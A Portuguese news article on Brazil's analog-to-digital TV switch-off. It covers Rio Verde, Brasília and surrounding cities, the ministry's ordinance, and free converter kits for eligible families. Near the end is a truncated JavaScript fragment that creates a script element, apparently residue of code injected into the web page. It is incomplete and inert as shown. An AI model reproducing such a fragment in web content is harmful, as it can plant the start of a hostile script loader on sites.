Bye bye, sinal analógico

tvpaga

 

Rio Verde, no interior de Goiás, foi a primeira cidade brasileira a receber a notificação para o desligamento do sinal analógico nos receptores de televisão e migrou para a tecnologia digital em março deste ano. Brasília será a próxima a seguir a norma, juntamente com outras nove cidades do Entorno do DF – Cristalina, Luziânia, Santo Antônio do Descoberto, Valparaíso, Cidade Ocidental, Novo Gama, Formosa, Águas Lindas e Planaltina. O prazo final para a mudança foi alterado para ontem (17).

Há um ano os telespectadores recebem avisos sobre a transição do sinal. Os lembretes são passados constantemente na programação regular das emissoras. No dia 28 de novembro de 2014, o Ministério das Comunicações publicou a portaria nº 3.205, que informava e estabelecia as condições e requisitos mínimos de divulgação da data oficial para o desligamento do sinal analógico.  Em maio passado, foi divulgado o número de cidades que teriam que migrar para o sinal digital: são 349 de oito unidades federativas. As mudanças terão que ocorrer até 2017.

 

Conversor  

Todos os televisores brasileiros podem receber o sinal digital, inclusive os modelos mais antigos. Para que a mudança ocorra, basta conectar o cabo da antena no aparelho e conectar o conversor no aparelho de TV por um cabo que suporte áudio e vídeo. Já para que os modelos modernos tenham o sinal digital, basta conectar a antena à TV. As famílias beneficiárias do programa Bolsa Família e as que têm cadastro único no Ministério do Desenvolvimento Social e Combate à Fome (MDS) receberão gratuitamente conversores de sinais. No total serão entregues 370 mil conversores. Para saber se tem direito a receber o aparelho, os telespectadores podem ligar para o número 174 ou acessar o site www.vocenatvdigital.com.br. Cada família que se adequar aos pré-requisitos receberá um kit que incluirá conversor e antena.  

 

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário